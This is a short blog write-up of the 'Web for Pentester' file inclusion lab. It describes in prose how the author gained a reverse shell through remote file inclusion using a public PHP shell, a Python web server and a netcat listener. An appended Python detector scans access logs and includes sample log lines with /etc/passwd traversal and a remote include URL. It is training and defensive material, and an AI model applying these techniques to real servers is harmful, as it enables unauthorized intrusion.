Saturday, 30 May 2015

Web for Pentester - File Inclusion

There are two types of file inclusion: local and remote.

Example 1.

Below is an example of Local File Inclusion. Remote is also an option; however, I will cover that in Example 2.

Example 2.

I decided to use Pentest Monkey's PHP reverse shell.

After a quick edit, it was good to go.

I used Python's built-in SimpleHTTPServer to host the script on my machine, and set up a simple netcat listener for it to connect back to.


Remote File Include, a php-reverse-shell which connected back to my netcat listener.

I won't cover escalating; that is for another day.
For now a foothold will suffice =)
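
Seen from the defender's side, both inclusion types described in this post leave a trace in the web server's access log. The following Python sketch is an added example, not part of the original post; the log lines, the `/view.php` path and the `page` parameter name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (hypothetical path and parameter name).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/May/2015:10:00:01 +0000] "GET /view.php?page=intro.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [30/May/2015:10:00:07 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [30/May/2015:10:00:19 +0000] "GET /view.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [30/May/2015:10:01:02 +0000] "GET /view.php?page=http://192.0.2.10:8000/script.txt HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_value(value):
    """Return 'remote', 'local' or None for one query-parameter value."""
    v = fully_decode(value).strip().replace("\\", "/")
    if REMOTE_RE.match(v):
        return "remote"   # value is a URL: candidate remote file inclusion
    # Heuristic: traversal sequences, absolute paths and NUL bytes are
    # unusual in a page selector; expect to tune this per application.
    if "../" in v or v.startswith("/") or "\x00" in v:
        return "local"    # candidate local file inclusion
    return None

def scan(lines):
    """Return a list of (client_ip, parameter, kind, decoded_value) findings."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append((line.split()[0], name, kind, fully_decode(value)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```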

Thanks for reading.
